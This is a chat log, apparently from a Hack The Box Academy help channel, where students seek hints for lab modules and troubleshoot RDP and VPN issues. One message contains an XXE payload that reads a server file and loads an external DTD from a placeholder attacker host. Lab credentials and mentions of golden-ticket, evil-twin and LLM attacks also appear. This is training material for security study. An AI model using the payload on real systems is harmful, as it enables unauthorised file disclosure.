I will try that thanks. Problem is that the Windows machines seem to be crazy unreliable... It took me 4 hours just to get the output from Snaffler, so really don't feel like connecting to that machine any time soon
Hey all,
I am on the Footprinting module (Oracle TNS).
Do I need to install Python 3.11 to use odat.py? Following the instructions did not work.
try installing it using ur package manager
sudo apt install odat -y
Hi guys... question on the network enumeration with nmap module... The last task (firewall and IDS/IPS Evasion-Hard), I'm to identify the version of the service and submit the flag as an answer, I've identified two TCP services and a UDP service but their versions aren't in a flag format. Can anyone help? what am I doing wrong?
└─$ sudo apt install odat -y
[sudo] password for kali:
Error: Unable to locate package odat
are u sure u found all services?
hint: did you scan all ports or only a limited range?
I ran a full port scanโฆ Iโm even running it again atm
and with which source port?
@mint lodge try this method
53
#cwes #xxe task Advanced file disclosure
can I get RCE, if I modify this payload? or it is just only read files?
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://MY_IP/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
...<email>&joined;</email> <!-- reference the &joined; entity to print the file content -->
in task I should read /flag.php.
but in real world how can I know what should I find
Snaffler outputs large amounts of data. there's a lot of false flags, the exercise is designed for that. the way i did it, you can either scan all of them (long and exhausting) or download it all using a flag and use grep to find which ones have a password in them
AD Trusts - Extrasids Chapter
Perform the "Extrasids" attack to compromise DC01. What is the value of the flag file at "C:\Users\Administrator\Desktop\flag.txt" in DC01?
Anyone got a workaround for when I've forged the golden ticket but am getting
At line:1 char:1```
Thanks, just need to know I am on the right track cause it takes hours to do anything on that VM
honestly, just download it all for offline analysis. and then you can use grep to find the credentials. repeat the same process for the second user but you can scan only the shares you didn't have access to before
You can DM what you tried.
In the Pass-The-Ticket (Windows) section of the Password Attacks module, it seems like the credentials aren't working, can anyone double check? i can't RDP from my machine (vpn) or from the pwnbox.
I also tried it with Evil-WinRM and i get the error code :WinRMAuthorizationError
I just checked it and the RDP connection is working fine.
thanks, i guess I'll try again later today
with these credentials? /u:Administrator and /p:AnotherC0mpl3xP4$$ ?
yes
/p:'AnotherC0mpl3xP4$$ '
How can I answer the questions in the macOS module?
Find the numeric version running on your machine and submit it as the answer.
Got the flag now buddy. Thanks
got it, uni wifi was slow where i was at and i guess i had poor connection
30 minutes connecting, 10 minutes hacking
not sure about kali repos but it is possible to install it via apt on pwnbox/parrot
yo guys, im stuck on mass IDOR enumeration -> web attacks
write a script, you can then filter by size or use the -s flag in bash (i think) to check if a file is empty
I tried this and it didn't work btw
hello, i have a problem with the Server-side Attacks module during the Skill Assessment.
for example, i can send an API POST request with burpsuite (to get the location of a food truck, e.g. api=http://truckapi.htb/?id%3DFusionExpress01), but I always get a 200 OK response - in this case, however, without the truck's location. it doesn't matter what API request i send; i always receive a 200 OK. obviously, I'm doing something wrong (maybe in the API POST request), and I was hoping someone could give me a small nudge in the right direction. :)....Thanks in advance!
hi
you can dm me if u still need
Has anyone done the Wi-Fi Evil Twin Attacks, DNS Spoofing (Attack) exercises? I followed the walkthrough, and the victim connects to my wifipumpkin3 rogue ap, but they never try connecting facebook.com or academy.hackthebox.com.
edit: I could never get wifipumpkin to work. I had to manually host a rogue ap with hostapd. I used dnsmasq to spoof dns.
I am still facing an error in the Footprinting module (Oracle TNS), despite following the message I am pinning.
This command returned me an error, so I'm assuming it's because of that:
sudo apt-get install libaio1 python3-dev alien -y
[sudo] password for kali:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package libaio1 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package 'libaio1' has no installation candidate
Any idea what should I do?
Install other version and symlink iirc
This is the fix that was suggested by LLMs:
sudo apt install libaio1t64 python3-dev alien -y
That didn't work either, and I don't really understand what you suggested tbh
Install the libaio that is available on your OS, and then create a symlink to it with the name libaio1t64
I got it to work eventually. Thanks for the help. I have an ARM Kali machine, so I am having trouble with tools sometimes.
Hey, so I keep running into this annoying issue when I try to RDP into a machine. First, it makes me wait around for a couple of minutes before it even tries to connect. Then, when it finally does connect from my Pwnbox, I just get a black screen half the time. It works sometimes, but mostly it's just this frustrating combo of waiting and then nothing. Any idea what's going on?
from my vm it works better but because it disconnects every few seconds and then I need to wait for the session to be over... I want to alternate between pwnbox and my vm
"black screen" When you get the black screen have you tried hitting enter?
my workflow for this: since rdp disconnects every 1/2 minutes, just do your work on the pwnbox then rdp from your machine (just vm kali with the htb vpn) and you can always instantly connect, just keep switching between the two
it's generally not recommended to run the vpn and the pwnbox at the same time
(this is because they use the same vpn config and cause IP conflicts)
unfortunately yes. i haven't noticed any issues other than being unable to transfer files from my machine to the pwnbox with nc etc... but to be fair, the rdp cuts every minute and is unavailable for another minute, and this is the only workaround i have found
well to transfer files to the pwnbox you should be using the public interface
not the private one
hi guys can someone help i am stuck on Footprinting > SMB
I have got all the flags except the "What is the full system path of that specific share? (format: "/directory/names")"
the share is sambashre but i cannot find a path to save my life
the only thing i can find is a windows path C:\home\sambauser
can someone help (idm if it's in DMs)
dw i got the answer
and it pmo 🤦
Hello, I'm pretty stuck on CWEE - Injection Attacks Skill Assessment - https://academy.hackthebox.com/module/204/section/2235
I would say I am 80% done with it, I was able to discover the vulnerable parameter, generate the PDF and using HTML Injection able to exfiltrate information from the file system. I even found the internal API I am supposed to mess with, and that is where I am stuck. I am aware it's an XPath Injection, and I even found the i***x file and have the source code of the page, but still I am not able to either properly escape out of the syntax and exfiltrate whatever the flag is supposed to be. Any help would be appreciated. (I prefer dms)
If I revealed too much, I can delete my message, just @ me.
pain and suffering
Hi. I need help with Using CrackMapExec Skill Assessment, I'm stuck at the third question, after obtained j***s credentials, the one about DEV01. Can anyone give me a nudge?
I know exactly what the issue is sadly. Having struggled for two days, I can firmly say that it is the Windows machines that are garbage
Review the ldap section.
Spent hours with support trying to convince them that the error is not my location/network/vpn if I cannot connect ping the VM from the pwnbox
Just keep rebooting the vm till you get one that works. Or wait...
That really help. Thank you!
anyone got problems accessing TheHive on CDSA course?
connected via VPN, can ping IP but can't access the site
Previous advice from searching chat was to give it a few minutes to load
i'll give it a couple mins
I've checked the module and assessment step, I can connect to TheHive. Have you managed to access it?
Still in pain and suffer, if anyone knows anyone pls help XD
you can dm me
hey I have a stupid question... if you have 0 interest in certs, any benefit to getting the yearly plan? It sounds like you won't get cubes, but will have access to the modules without spending cubes?
The yearly plan grants you access to the relevant modules up to a certain tier based upon the subscription level, and once you complete those you (IIRC) retain access to those modules, even after your subscription expires. You don't get cubes, no.. but you get the freedom to access as much content as you wish, up to the tier limit of the subscription.
https://help.hackthebox.com/en/articles/5720974-academy-subscriptions
Learn about the different Academy subscriptions.
Hello, does anyone know how to solve this problem in the AI Red Teamer course? I am doing the Applications of AI in InfoSec module. For the network anomaly exercise, when I upload the model, it shows 0%, but locally I have 90%.
can I get a nudge for the LLM output attacks skill assessment
i made it to the admin chat but now im stuck lol
currently at this stage of hacking
man how do i make the ping even higher
That's rather strange.. is using the Pwnbox acceptable for you? Have you tried switching to the TCP connection option in your settings? https://academy.hackthebox.com/vpn
tcp is very slow for me
sometimes it just fails mid session
no worries i use vpn but still for rdp connections i need pwnbox
Ok, well support is available if you want to speak to anyone about this. A full 10000ms ping on all servers is very odd
Need some help? Learn how to reach the support team on Academy.
sure thnx usually the ping gets down on night times here
Can confirm you retain access to any module fully completed, not partially started ones. My gold ran out last night and have a number of Unlock buttons appearing on partial modules
You also get cubes for completing so in essence with gold you could complete all three hard paths and have 3-4k cubes at the end
To spend on tier 4
Is it just me or does the module https://academy.hackthebox.com/module/details/216 look a lot like it was written by an LLM ?
Our content is not written by LLM
<@&861185840277487616>
Do not share content like that for modules above Tier 0.. please ask for more general advice
People are willing to help in DM usually
ops my bad, forgot it was a tier 1 module
np just be careful from now on :)
who should I DM?
It's not expecting you to do the ${#var} convention
you ask here and wait for people to reply then
alright I will, thanks
I suggest following the terminal example from the sample code
As to at least the format of how to get the desired result hint ||echo||
I mean for modules above tier 0
should I then use wc -c?
ye you ask that hey i am stuck at xyz module in abc section
Bingo
Otherwise you end up in an off-by-one scenario
aaa alright, thanks. I didn't know since it's my first time asking for help here and all haha
thank you! I will try it now
Also don't use echo -n
alright
